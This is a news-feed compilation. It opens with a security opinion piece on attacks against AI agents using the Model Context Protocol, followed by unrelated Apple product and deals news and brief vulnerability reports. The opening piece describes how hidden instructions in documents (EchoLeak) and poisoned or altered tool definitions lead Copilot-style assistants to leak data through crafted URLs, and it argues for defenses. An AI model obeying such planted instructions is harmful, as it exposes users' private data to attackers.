EchoLeak (CVE-2025-32711) represents the apotheosis of what security researchers had long dreaded but harbored faint hope might remain perpetually theoretical. Aim Security’s June 2025 disclosure documented a zero-click exploit of such elegance that it almost inspires grudging admiration. Adversaries secrete malicious prompt instructions within the detritus of quotidian business documents: speaker notes that no human eye ever scrutinizes, comments that no reviewer ever examines, metadata fields that exist in perpetual obscurity. When Microsoft 365 Copilot ingests these poisoned documents, it executes the occluded instructions with mechanical obedience, siphoning sensitive contextual data to attacker-controlled endpoints. The victim performs no action. Receives no admonition. Suffers complete compromise.
The attack concatenation warrants meticulous examination. An adversary confects a document harboring hidden text instructing the AI to extract the most sensitive information from the user’s operational context and encode it within an outbound URL. The document arrives via electronic mail or shared repository. The user opens it, or perhaps merely previews it in passing. The AI assistant, inexorably helpful, processes the content and dutifully executes the embedded directives. Sensitive data traverses the network masquerading as an innocuous image request. Exfiltration accomplished. Detection probability approximating zero.
The mcp-remote debacle, catalogued as CVE-2025-6514, illuminates the supply chain dimension of this burgeoning crisis with unsparing clarity. JFrog’s July 2025 disclosure revealed that this package, downloaded north of 437,000 times and prominently featured in integration documentation from Cloudflare, Hugging Face, and Auth0, harbored a critical command injection vulnerability. The vulnerability exploited improper sanitization of OAuth flow parameters, enabling attackers to inject shell commands through the authorization endpoint field. On Windows systems, PowerShell subexpression evaluation amplified the attack surface exponentially, granting adversaries complete system subjugation through a single malicious MCP server connection.
The epistemological chasm
What renders MCP vulnerabilities particularly vexatious is the fundamental asymmetry they exploit between machine cognition and human oversight.
Tool poisoning attacks insert malevolent instructions into tool metadata that LLMs process with complete fidelity but that remain utterly invisible to human operators. The machine perceives everything; its ostensible supervisors perceive nothing. We have unwittingly constructed systems where the attack surface exists in a cognitive dimension our monitoring instrumentation cannot observe. This represents a fundamental rupture in the supervisory relationship between humans and their AI auxiliaries, creating exploitation opportunities that traditional security controls simply cannot address.
Rug pull attacks weaponize temporality itself against defenders. An MCP server presents pristine, innocuous tool definitions during initial security vetting, earning approbation and establishing trust. Subsequently, those definitions undergo surreptitious transmutation, incorporating malicious functionality where none previously existed. Because most MCP clients remain quiescent when definitions change, attackers corrupt previously sanctioned tools with impunity. The temporal gap between approval and exploitation renders traditional point-in-time security assessments wholly nugatory.
Cross-server contamination compounds these perils multiplicatively. When multiple MCP servers connect to the same LLM context, a malicious server can inject instructions that influence the agent’s comportment toward trusted servers. Authentication credentials intended for legitimate services get redirected through adversary-controlled channels. The trust relationships we painstakingly constructed metamorphose into attack vectors themselves.
Constructing defenses that actually work
Conventional security apparatus proves woefully inadequate against these sui generis threat vectors. What is required is a purpose-built framework acknowledging MCP’s distinctive vulnerabilities with commensurate architectural rigor.
The Cloud Security Alliance’s Agentic Trust Framework, published in February 2026, articulates foundational principles we so desperately require: AI agents demand identity governance as rigorous as human users. No implicit trust. Authentication and authorization on every interaction without exception. Strict separation between reasoning and action. These principles must be transmuted into operational controls before the breach headlines proliferate beyond containment.
Sunil Gentyala
The architecture diagram illustrates a stratified defense model operationalizing these principles with methodological rigor. The Cryptographic Verification Layer establishes server authenticity through X.509 certificate validation and continuous capability attestation; any definitional mutation produces hash discrepancies triggering mandatory re-authorization, neutralizing rug pull attacks at their provenance. The Dynamic Integrity Monitoring System employs semantic fingerprinting to detect definitional drift with granular precision, utilizing isolation forest algorithms to identify anomalous invocation patterns indicative of compromise. The Supply Chain Validation Engine addresses tool poisoning’s semantic nature through MCP-specific scanning parsing tool descriptions for adversarial prompt patterns and Unicode obfuscation techniques that evade cursory inspection. The Policy Enforcement Point implements fine-grained authorization for every tool invocation, incorporating principal identity, resource sensitivity, environmental context, and real-time risk scoring. Coarse-grained session permissions yield to continuous, context-aware evaluation.
The imperative for immediate action
Security teams must act with alacrity and dispatch. Enforce authentication on every MCP server without exception or equivocation. Segment networks to eliminate direct internet exposure categorically. Institute immutable versioning with cryptographic signing for all tool definitions. Deploy behavioral monitoring capable of detecting anomalous invocation patterns indicative of compromise or misuse. Mandate human-in-the-loop approval for sensitive operations rather than treating the specification’s recommendations as merely aspirational guidance.
February 2026 scanning data proffers cold comfort to those seeking reassurance. Unauthenticated server percentages have declined proportionally to 41 percent. Progress, ostensibly. But absolute exposure has increased tenfold as adoption accelerates with breakneck velocity. We are hemorrhaging ground faster than we are gaining it. The adversary has recognized the opportunity before us with predatory acuity, and honeypot telemetry confirms active reconnaissance against MCP infrastructure from sophisticated threat actors across multiple geographies.
Your AI infrastructure represents either an invaluable asset or a catastrophic liability. The adversary has rendered their assessment with cold-eyed clarity. The window for meaningful action contracts with each passing week, and the cost of inaction compounds exponentially. The framework exists. The architecture is implementable. What remains is organizational will.
Have you made yours?
This article is published as part of the Foundry Expert Contributor Network.
Want to join?
View the full article
macOS 27 will have a "slight redesign" compared to macOS Tahoe, along with an option to automatically group tabs in Safari, according to Bloomberg's Mark Gurman.


In his Power On newsletter today, Gurman said the design changes will help to address some of the criticism surrounding macOS Tahoe's new Liquid Glass interface. In particular, the changes should improve overall readability.

"Apple aims to address the shadows and transparency quirks," he said.

In addition, Gurman said Apple is testing a new AI-powered Safari feature that can automatically organize browser tabs into groups. This feature, previously revealed by MacRumors, is expected to be available across macOS 27, iOS 27, and iPadOS 27.

"I'm told that in test versions of iOS 27, the center-top button that users can tap to move between their tab groups has a new option called 'Organize Tabs,'" he said. "You can choose whether you want the grouping to occur automatically or not."

Apple will unveil macOS 27 during its WWDC 2026 keynote on Monday, June 8.

The first developer beta of macOS 27 will likely be available immediately following the keynote, and a public beta typically follows in July. Following beta testing, the software update should be released to all users in September.

Related Reading: Apple to Unveil macOS 27 Next Month With These New FeaturesRelated Roundups: macOS 27, WWDC 2026Tags: Bloomberg, Mark Gurman, SafariRelated Forum: Apple, Inc and Tech Industry
This article, "macOS 27: Two More Changes Leaked Ahead of WWDC Next Month" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple's new 14-inch M5 Pro MacBook Pro with 24GB RAM and 1TB SSD is still available for an all-time low price this weekend on Amazon. It's available for $1,983.94, down from $2,199.00.

Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

This beats the previous deal we tracked on this model by about $17, and as of writing it's only available in Space Black. Amazon provides a free delivery estimate by around May 12, with quicker delivery for Prime members.

$216 OFF14-inch M5 Pro MacBook Pro (24GB/1TB) for $1,983.94

You can also get up to $200 off the 16-inch MacBook Pro model right now on Amazon, with the 48GB RAM/1TB M5 Pro model hitting an all-time low price of $2,899.00, down from $3,099.00.

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Apple's 2026 MacBook Pro Available for Record Low Price This Weekend" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple's new AirPods Max 2 just launched last month, and you can get all five color options for $509.00 this weekend on Amazon, down from $549.00.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

This is a match of the all-time low price on the brand new AirPods Max 2 headphones. Free delivery has the AirPods Max 2 arriving around May 11, while Prime members may be able to find quicker options in select locations.

$40 OFFAirPods Max 2 for $509.00

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "AirPods Max 2 Available for $509 in All Colors on Amazon" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
cPanel has released updates to address three vulnerabilities in cPanel and Web Host Manager (WHM) that could be exploited to achieve privilege escalation, code execution, and denial-of-service. The list of vulnerabilities is as follows - CVE-2026-29201 (CVSS score: 4.3) - An insufficient input validation of the feature file name in the "feature::LOADFEATUREFILE" adminbin call that could resultView the full article
With Apple preparing to unveil iOS 27 and related updates at WWDC in just under a month, iOS 26.5 and friends are now right around the corner with some minor tweaks before we get our first look at the next major update.


This week also saw Apple making more changes to its Mac mini and Mac Studio offerings amid product shortages, while the company is weighing how it can meet strong demand for the new MacBook Neo, so read on below for all the details on these stories and more!

Top Stories

Apple Says iOS 26.5 Adds Three New Features to Your iPhone

iOS 26.5 includes three new features for iPhones, according to Apple's release notes for the update, which is expected to be released next week.


As discovered during beta testing, iOS 26.5 enables end-to-end encryption for RCS messaging between iOS and Android devices. Apple says this security upgrade is limited to supported carriers around the world and will continue to roll out.

The second new feature added in iOS 26.5 is "Suggested Places" in Apple Maps. This section of the app provides recommendations based on your location and recent searches, and it will start showing ads in the U.S. and Canada later this year.

Third, a new Pride Luminance wallpaper that "dynamically refracts a spectrum of colors" is available to download on iPhones and iPads running iOS 26.5 or iPadOS 26.5. Released alongside a new Pride Edition Sport Loop and Pride Luminance watch face, Apple says the wallpaper celebrates LGBTQ+ communities around the world.

Why You Might Want to Wait to Buy a MacBook Pro

Apple refreshed the 14-inch and 16-inch MacBook Pro with M5 Pro and M5 Max models in March 2026, but depending on your needs and interests, you might want to skip this generation because there's something better in the works.


The M5 Pro and M5 Max ‌MacBook Pro‌ models have faster chips, but the same design that Apple has used since 2021. An updated design with new display technology and faster performance is coming in late 2026 or early 2027. Check out our overview of everything rumored for this upcoming "MacBook Ultra."

Apple Stops Selling Mac Mini With 256GB of Storage, Starting Price Rises to $799

Apple last week stopped offering a 256GB storage option for the Mac mini worldwide. As a result, the desktop computer now has a higher starting price.


In the U.S., for example, the Mac mini now starts at $799 with the M4 chip, 16GB of RAM, and 512GB of storage, whereas it previously started at $599 with the M4 chip, 16GB of RAM, and 256GB of storage.

Apple is also continuing to cut other configurations of the Mac mini and Mac Studio as the company has been hit by related issues of memory shortages throughout the industry amid strong demand from customers looking to use these machines for AI-related purposes.

Apple Was Caught Off Guard by MacBook Neo's 'Off the Charts' Demand

Apple's most affordable MacBook ever appears to be a resounding hit with customers, based on comments shared by CEO Tim Cook last week.


On an earnings call last Thursday, Cook said that customer response to the MacBook Neo has been "off the charts" since the laptop was unveiled in March. "We could not be happier with how things are going at the moment," he said.

Apple has been struggling to meet customer demand for new laptop, and the company is said to be running out the A18 Pro chips used to power them. With Apple rumored to be considering ordering another run of the chips that will add to the cost, plus rising memory costs, tech columnist Tim Culpan believes Apple could be considering dropping the entry-level $599 configuration of the MacBook Neo and perhaps offering it in some additional colors.

iPhone 18 Pro Rumored to Keep Aluminum Finish Amid Durability Complaints

The iPhone 18 Pro will reportedly carry over the same anodized aluminum finish introduced with the iPhone 17 Pro, despite concerns from some users about its durability.


According to the Weibo leaker known as "Fixed Focus Digital," surface chipping on the ‌iPhone 17 Pro‌ has become a common complaint, and that users who have sought recourse from Apple have been told they cannot claim it, with the company classifying the issue as an inherent characteristic of the aluminum alloy material and normal wear and tear. Crucially, they added that the ‌iPhone 18 Pro‌ will "continue to utilize this same design approach" despite its weaknesses.

Separately, a fresh leak of a CAD render for the iPhone 18 Pro lends support to circulating rumors of a smaller Dynamic Island.

iPhone 18 Might Look a Lot More Like an 'e' Model, Leaker Claims

The standard iPhone 18 and the lower-cost iPhone 18e are said to share components, according to the leaker known as "Fixed Focus Digital," as further evidence that Apple is narrowing the gap between the two devices.


In recent posts on Weibo, Fixed Focus Digital said that certain parts are interchangeable between the two models, adding that the information originates from a reliable manufacturing source. The leaker described the component overlap as confirmation that the specification convergence between the ‌iPhone 18‌ and iPhone 18e is real and measurable at the supply chain level. "Take it from me: The standard ‌iPhone 18‌ model has been downgraded and its launch delayed—this decision is final and will not change," they added.

MacRumors Newsletter

Each week, we publish an email newsletter like this highlighting the top Apple stories, making it a great way to get a bite-sized recap of the week hitting all of the major topics we've covered and tying together related stories for a big-picture view.

So if you want to have top stories like the above recap delivered to your email inbox each week, subscribe to our newsletter!Tag: Top Stories
This article, "Top Stories: iOS 26.5 Coming Soon, Goodbye $599 Mac Mini, and More" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple is developing a wearable AI device that's been described as a pin or pendant, and that could compete with a similar AI product coming from OpenAI's Jony Ive. It wasn't clear if the wearable would actually make it to launch because Apple sometimes cancels projects, but it is still in the works and could come as soon as next year.


1. It'll Look Like an AirTag

Apple's design plans could change, but rumors suggest the device is a pin or pendant that looks similar to an AirTag. It's been described as having a thin, flat, circular disc shape, with an aluminum and glass shell. A physical control button is included on one edge.

Apple wants the final version of the device to be about the same size as an ‌AirTag‌, but because of the hardware inside, it could be thicker.

It sounds like the wearable will be versatile. It could have a clip to attach to clothing like a pin, but there's also supposedly a hole in the device so it can be worn as a necklace. Rumors have referred to it as both a pin and a pendant.

2. There Will Be Cameras

Apple's AI wearable is going to have at least one camera, but rumors are mixed on exactly what the camera will be used for.

Bloomberg says the pin will have a low-resolution camera that gives it info about its surroundings rather than a camera for capturing photos and videos. The camera will be always-on and processing visual data, but users will not be able to use it for images.

The Information reports there will be two front cameras, one with a standard lens and one with a wide-angle lens for capturing photos and videos.

Apple's AI device will rely heavily on Visual Intelligence, which is currently an iPhone feature that uses the camera to provide users with more information about places and objects around them.

3. Siri is the Brain

Rumors have described Apple's wearable as an AI pin or pendant, because it's going to be reliant on artificial intelligence. It's one of several AI-equipped devices that Apple is working on, and it will give wearers a way to interface with Siri without having to use an iPhone.

The camera on the pin will give ‌Siri‌ insight, and ‌Siri‌ will be able to answer questions about what the wearer is looking at or the wearer's surroundings.

Apple is planning to completely overhaul ‌Siri‌ in iOS 27, turning the personal assistant into a much smarter chatbot on par with Claude, Gemini, and ChatGPT.

4. iPhone Required

While the AI wearable will have a chip inside, it will be a smaller chip that's similar to the H2 in the AirPods. It won't use a high-powered chip, and most processing will need to be done on the iPhone.

The pin is not meant to be a standalone device, and it will instead be marketed as an iPhone accessory.

5. It'll Listen, But Might Not Talk Back

To listen for voice requests and to pick up sounds around the wearer, the AI pin will have a microphone. Apple has not yet decided whether to add a speaker for back-and-forth ‌Siri‌ conversations and audio playback.

If there's no speaker, responses might be directed to the wearer on the iPhone, Apple Watch, or AirPods.

Release Date

Bloomberg's Mark Gurman said this week that the AI wearable could see a launch as soon as 2027.Related Roundup: AirTagTag: Apple AI PinBuyer's Guide: AirTag (Buy Now)
This article, "Apple's AirTag-Sized AI Pendant: Five Features Rumored So Far" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
With watchOS 26.5, Apple is introducing a Pride Luminance face, and it's one of the most versatile and customizable watch faces. There are pre-configured color options, but the face also supports custom colors.


You can select 1 to 12 colors from a palette that has every color of the rainbow, some in-between shades, and black, white, brown, and gray.


The colors you pick are distributed across the watch face in a gradient, available in either radial or linear styles. The first style looks like a starburst, while the second style is a series of rectangular lines.


The dial can be set to Rectangle for edge-to-edge color, or Circle for a smaller dial that supports four complications.

As with most of Apple's faces, the Luminance face is animated. When the wrist is down, it shrinks into slim lines of color on a black background, but when the wrist is raised, the full color palette is displayed. Colors will also shift slowly.


Apple's pre-selected colors represent different Pride flag colors, but with the deep customization options, the Pride Luminance face can match clothing, show off support for sports teams, or just display your favorite colors.


iOS 26.5 also has a matching Pride Luminance Wallpaper option that can be customized in the same way. You can choose up to 12 colors for the Lock Screen and Home Screen. On the Lock Screen, the colors collapse onto a black background when the device is locked.


To get the new watch face, you need iOS 26.5 and watchOS 26.5. Apple has released RCs, and the public versions of the updates are expected as soon as next week. Related Roundup: watchOS 26Related Forum: Apple Watch
This article, "A Closer Look at watchOS 26.5's New Luminance Watch Face" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
The five new vulnerabilities discovered in Ivanti’s on-premises mobile endpoint management solution are a “classic example of the legacy trap” that CSOs must avoid, says an expert.
“Patch today to survive the weekend,” said Robert Enderle of the Enderle Group, “but start planning your exit from legacy MDM as soon as possible.”
He was commenting on an advisory issued Thursday by Ivanti about the discovery of five holes in its Endpoint Manager Mobile (EPMM) suite. Updates for all are available.
The flaws are serious enough that the US Cybersecurity and Infrastructure Security Agency (CISA) added one of the vulnerabilities to its Known Exploited Vulnerabilities Catalog because it’s being actively exploited.
“This isn’t an isolated incident,” Enderle added. “It’s a continuation of the cycle we saw in January, suggesting an underlying architecture struggling to withstand modern threats.”
A “very limited number of customers” have been exploited through one of the vulnerabilities revealed this week, CVE-2026-6973. An improper input validation in EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remotely authenticated user with administrative access to perform remote code execution.
Johannes Ullrich, dean of research at the SANS Institute, told us that Ivanti is right to point out that exploitation of this hole does require administrative access, and that attackers may have obtained the necessary credentials through exploits of prior vulnerabilities. Rotating credentials is critical after patching an already exploited vulnerability, he said. “Even if no obvious signs of compromise are noted, it is hard to impossible to exclude a compromise. Best to rotate credentials even if no indicator of compromise was found.”
Ullrich also pointed out that in a blog post accompanying the advisory, Ivanti stated that it is using AI tools to proactively identify new vulnerabilities. “This may result in more vulnerability reports in the future,” he said. “I applaud Ivanti’s openness and willingness to publicly enumerate the vulnerabilities as they are being fixed. It is important for organizations using the Ivanti product (or any product) to understand the risks of not patching or of delaying the patch.”
The four other flaws are:
CVE-2026-5787, with a CVSS score of 8.9, an improper certificate validation that allows a remote and unauthenticated attacker to impersonate registered Ivanti Sentry security gateway hosts and obtain valid CA-signed client certificates; CVE-2026-5786, with a CVSS score of 8.8, an improper access control vulnerability that allows a remote authenticated attacker to gain administrative access; CVE-2026-5788, an improper input validation hole that allows a remotely authenticated user with admin privileges to execute code remotely.
Ullrich said he is “surprised that Ivanti assigned such a low CVSS score, 7.0, to this vulnerability. The description sounds more severe, but there are insufficient details to determine how Ivanti evaluated this vulnerability”; CVE-2026-7821, an improper certificate validation vulnerability that allows a remote unauthenticated attacker to enroll a device belonging to a restricted set of unenrolled devices, leading to the disclosure of information about the affected EPMM appliance.  Sentry doesn’t contain any of these vulnerabilities. However Ivanti admins should be aware that if they add a new Sentry server after EPMM has been updated, they will need to use one of the new Sentry versions (10.4.2, 10.5.1 or 10.6.1).  
To respond to the five new vulnerabilities in EPMM, Enderle said that CSOs must update to the resolved versions 12.6.1.1+ immediately, and rotate all administrative credentials. That’s because attackers who executed previous exploits may already hold the keys to bypass these fixes.
“Beyond the immediate patch,” he added, “verify that Apple Device Enrolment is disabled if not in use, and begin a strategic evaluation of whether these aging on-premises appliances still fit a Zero Trust model.”
View the full article
While not too much has been reported about the next Apple Watch models, there are a few rumors about potential design changes and watchOS 27 features.


Apple Watch Series 12 and Apple Watch Ultra 4 models are expected to be released in September, and we have outlined some of the key rumored hardware and software changes below. A new Apple Watch SE is not expected this year, as that model was just updated last year and it typically goes two to three years between refreshes.

Apple will unveil watchOS 27 during its WWDC 2026 keynote on Monday, June 8, and a developer beta will likely be available immediately afterwards. A public beta typically follows in July, and the update should be widely released in September.

Touch ID

Touch ID may be coming to the Apple Watch Series 12 and Apple Watch Ultra 4, according to internal Apple software code that leaked online last year.

Touch ID would likely be built into the Apple Watch's side button, enabling users to unlock the device with their fingerprint instead of a passcode.

Even though new Touch ID references were discovered within the code, there is no guarantee that Apple will move forward with this plan either this year or ever. In addition, credible sources such as Bloomberg's Mark Gurman and Apple supply chain analyst Ming-Chi Kuo have yet to mention Touch ID coming to the Apple Watch this year.

New Chips After One-Year Hiatus

While the Apple Watch Series 11, Apple Watch Ultra 3, and Apple Watch SE 3 all contain the same S10 chip as the previous year's models, the leaked Apple code indicated that the Series 12 and Ultra 4 will get a new chip. It is unclear if the chip will have S11 or S12 branding, but performance improvements are expected either way.

New Modular Watch Face

watchOS 27 will reportedly include new watch faces, including a variant of the "Modular Ultra" watch face that is currently exclusive to the Apple Watch Ultra.

New Apple Intelligence Features

On watchOS 26, the following Apple Intelligence features are available on an Apple Watch when it is paired with an iPhone 15 Pro or newer:
Workout Buddy
Live Translation in Messages
Notification SummariesWhen it announced the dates for WWDC 2026, Apple promised to unveil "AI advancements" across its platforms, and it can be reasonably assumed that watchOS 27 will include some additional Apple Intelligence features powered by the iPhone.

New Satellite Features

Apple Watch Ultra 3 has built-in satellite connectivity, enabling Emergency SOS, Find My, and Messages via satellite without any reliance on an iPhone.

iOS 27 will reportedly include up to five new satellite features, and the following two would likely extend to watchOS 27:Apple Maps via satellite
Photos support for Messages via satelliteAmazon last month announced plans to acquire Globalstar, the satellite company that powers Apple's satellite features on the iPhone 14 and newer and the Apple Watch Ultra 3. In turn, Amazon announced that it has signed an agreement with Apple to provide satellite connectivity for current and future iPhone and Apple Watch features.Related Roundups: Apple Watch 11, Apple Watch Ultra 3, watchOS 26Buyer's Guide: Apple Watch (Caution), Apple Watch Ultra (Neutral)Related Forum: Apple Watch
This article, "Apple Watch Series 12 and watchOS 27: What to Expect Later This Year" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
After more than a year of discussion, Apple and Intel established a preliminary agreement that will see Intel manufacturing processors for Apple devices, reports The Wall Street Journal.


Intel would make chips based on Apple chip designs, much like TSMC. Prior rumors on Intel's Apple talks have suggested Intel could make some of the lower-end processors used in Apple devices, including the lowest-end M-series chip used in select iPad and Mac models.

Before Apple adopted Apple silicon, it used Intel-designed chips for its Macs, but had to deal with continual chip delays. Apple now designs its own Arm chips that are manufactured by TSMC, allowing it to provide updates at a more regular cadence.

Intel makes its own chips, but it also makes chips for other companies. Apple has not previously eyed Intel as a supplier because it has lagged behind other chip makers like TSMC and Samsung, and because of the history between the two companies. Intel replaced CEO Pat Gelsinger with Lip-Bu Tan last year, and Tan has led an effort to revitalize Intel's chip manufacturing business.

Tan has been focusing on Intel's most advanced process node, 14A, which will reach production in 2028. Intel has been seeking customers for its 14A 1.4nm node. Intel also makes 18A chips built on a 1.8nm node, along with chips built on older process nodes.

Apple has been working to diversify its supply chain, because Taiwan Semiconductor Manufacturing Co. (TSMC) is currently its sole Apple silicon manufacturer. During Apple's latest earnings call, CEO Tim Cook said iPhone 17 models had been constrained during the quarter because Apple could not get enough A19 and A19 Pro chips from TSMC.

TSMC is one of the world's largest chip manufacturers, and along with making chips for Apple, it makes chips for other companies like Nvidia. With the AI boom and huge demand for AI servers, TSMC has more limited capacity for chips made for consumer devices, and Apple has less leverage to convince TSMC to make its chips.Tag: Intel
This article, "Apple Could Soon Be Buying iPhone and Mac Chips From Old Frenemy Intel" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
As of today, end-to-end encryption for Instagram direct messages is no longer available. DMs that you send to people on Instagram will no longer feature full encryption, and your conversations are not protected from Meta.


Meta can potentially see what's in messages shared between users on Instagram, and that information can be shared with law enforcement agencies worldwide.

End-to-end encryption has been an opt-in messaging feature on Instagram since 2023, but Meta quietly removed it. Meta told The Guardian earlier this year that it is removing the encryption feature because not enough people adopted it. At the same time, Meta did not turn it on by default, nor did the company alert users that it was an option. Sending an encrypted message required turning it on for each individual conversation by tapping into a buried per-conversation setting. Meta also never rolled the feature out to all Instagram users.

"Very few people were opting in to end-to-end encrypted messaging in DMs, so we're removing this option from Instagram in the coming months," Meta said. Meta suggests that people who want end-to-end encryption should use WhatsApp, which is another messaging app that it owns. iMessage and other apps like Signal that are not Meta-owned also offer end-to-end encryption.

Law enforcement agencies and child safety advocates have long pushed for Meta to remove encryption, but Meta could also be getting something out of the feature's removal. It's possible the company will be able to use direct messaging content for advertising algorithms or training chatbots. Meta says that content in DMs is not used for targeted ads right now, but there is wording that allows for product improvement.

Meta's decision to remove Instagram's end-to-end encryption comes 11 days before the Take It Down Act takes effect. The actf will require platforms to remove non-consensual intimate imagery like deepfakes within 48 hours of a takedown notice, but with E2EE in place, Meta can't access the content needed to comply.

Instagram users who have end-to-end encrypted chats have been given instructions on how to download media or messages that they want to keep.

Last year, Meta started using private generative AI conversations to personalize content and customize ad recommendations for Facebook, Instagram, WhatsApp, and Messenger users, so there seems to be little limit on the data that it will use to generate revenue. WhatsApp and Messenger continue to have end-to-end encryption for the time being.Tag: Instagram
This article, "Warning: Instagram DMs Lose End-to-End Encryption Starting Today" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Mother's Day is just two days away now, and you can still find great discounts across multiple retailers like Anker and ZAGG. Additionally, this week we began tracking new record low prices on the AirPods Max 2, M5 Pro MacBook Pro, and iPhone Air MagSafe Battery.

Note: MacRumors is an affiliate partner with some of these vendors. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

Mother's Day Deals


What's the deal? Save on popular accessories and more
Where can I get it? Anker, OtterBox, ZAGG, and more
Where can I find the original deal? Right here

Mother's Day is this Sunday, May 10, and multiple popular accessory companies are hosting big discount events to mark the holiday. You'll find savings on Anker charging accessories, OtterBox iPhone cases, ZAGG screen protectors, and much more in the list below.

Anker - Get up to 40% off charging accessories
AT&T - Get iPhone 17 Pro Max for up to $1,100 off
Best Buy - Save on everything from wearable tech to TVs and more
Belkin - Get up to 30% off
Casetify - Buy two get 20% off
Grid Studio - Get 15% off sitewide
Hyper - Get 20% off select products
Nimble - Get 20% off with code MOM20
OtterBox - Get 25% off sitewide
Verizon - Get iPhone 17, iPad, and Apple Watch Series 11 for no cost when switching
ZAGG - Get 25% off screen protectors and cases

AirPods Max 2


What's the deal? Take $40 off AirPods Max 2
Where can I get it? Amazon
Where can I find the original deal? Right here
$40 OFFAirPods Max 2 for $509.00

Amazon this week introduced a new record low price on the AirPods Max 2, now available for $509.00, down from $549.00. This sale is available in all five colors of the headphones.

MacBook Pro


What's the deal? Take up to $216 off M5 Pro/M5 Max MacBook Pro
Where can I get it? Amazon
Where can I find the original deal? Right here
$216 OFF14-inch M5 Pro MacBook Pro (24GB/1TB) for $1,983.94
$150 OFF16-inch M5 Pro MacBook Pro (24GB/1TB) for $2,549.00

Amazon is offering a few all-time low prices on Apple's M5 Pro/M5 Max MacBook Pro this week, with up to $216 off select models.

iPhone Air MagSafe Battery


What's the deal? Take $39 off
Where can I get it? Amazon
Where can I find the original deal? Right here
$39 OFFiPhone Air MagSafe Battery for $59.99

Following a few steep discounts on the iPhone Air last month, we're now tracking a new all-time low price on the iPhone Air MagSafe Battery on Amazon. You can get the accessory for $59.99, down from $99.00, beating the previous low price by about $20.

Samsung Sale


What's the deal? Save on Samsung's best monitors, TVs, and more
Where can I get it? Samsung
Where can I find the original deal? Right here
UP TO $1,099.99 OFFSamsung Monitor Sale
$800 OFF65-inch The Frame for $999.99
$1,000 OFF75-inch The Frame Pro for $2,199.99

Samsung this week is offering big discounts across multiple product categories, including its most popular monitors and TVs. This sale precedes the announcement of Samsung's newest line of 2026 monitors, and if you sign up with your e-mail and phone number, you can lock in $50 savings on the upcoming monitors.

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Best Apple Deals of the Week: Shop Popular Mother's Day Accessory Deals, Plus AirPods Max 2 for $509.99" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Threat hunters have flagged a previously undocumented Brazilian banking trojan dubbed TCLBANKER that's capable of targeting 59 banking, fintech, and cryptocurrency platforms. The activity is being tracked by Elastic Security Labs under the moniker REF3076. The malware family is assessed to be a major update of the Maverick, which is known to leverage a worm called SORVEPOTEL to spread viaView the full article
Apple today seeded new release candidate versions of upcoming iOS 26.5 and iPadOS 26.5 updates to developers for testing purposes, with the software coming five days after the first RC. It's not clear what's changed in the second RC, but Apple typically sends out another candidate if there are bugs that need to be addressed.


Registered developers can download the betas from the Settings app on the iPhone or iPad by going to the General section and selecting Software Update.

iOS 26.5 and iPadOS 26.5 do not include new Siri capabilities, suggesting any ‌Siri‌ updates are being held until iOS 27. The Maps app has a Suggested Places feature for recommending locations to visit nearby based on trends and recent searches, plus Apple is laying the groundwork for ads in the Apple Maps app.

Apple is continuing to test end-to-end encryption (E2EE) for RCS messages between iPhone and Android users. Apple included the feature in the iOS 26.4 beta, but removed it before the update launched to the public.

There is a new Pride wallpaper to go along with the Pride Apple Watch band for this year.

More detail on what's new in iOS 26.5 can be found in our iOS 26.5 beta features guide. iOS 26.5 is likely to see a launch next week. Related Roundups: iOS 26, iPadOS 26, iOS 27Related Forum: iOS 26
This article, "Apple Seeds Second iOS 26.5 and iPadOS 26.5 Release Candidates to Developers" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
For this week's giveaway, we've teamed up with Plugable to offer MacRumors readers a chance to win a MacBook Neo and a Plugable ‌MacBook Neo‌ accessory kit that includes the UD–6950PDH USB-C Docking Station, USBC–9IN1E USB-C Hub, and the PS–30C1 30W power adapter.


Plugable makes a wide range of accessories for Apple devices, and it is perhaps best known for its hubs and docks. There are several dock and hub options that work well with Apple's new low-cost ‌MacBook Neo‌, and Plugable's solutions are affordable.

The UD–6950PDH USB-C 14-in–1 Dock is priced at $180, and it adds multiple ports to the ‌MacBook Neo‌ or another Mac. There's a 5Gb/s USB-C port that also provides power for accessories, four 5Gb/s USB-A ports (one of which can power peripherals), microSD and SD card reader slots, a 100W USB-C port for charging a connected MacBook, a 1Gb/s Ethernet port, two HDMI ports, two DisplayPorts, and a K-Lock for security.


The dock supports two 4K 60Hz displays connected via HDMI or DisplayPort, and it uses DisplayLink software to get around display limitations on the ‌MacBook Neo‌ and other Macs. Even though the ‌MacBook Neo‌ only supports one external 4K display natively, with the dock, it can power two displays.


For those who only need a single display, Plugable has the $50 9-in–1 USB-C Hub. It connects to the ‌MacBook Neo‌ or another Mac via USB-C, adding several useful ports. Unlike the dock, it does not need an external power source because it is bus-powered.


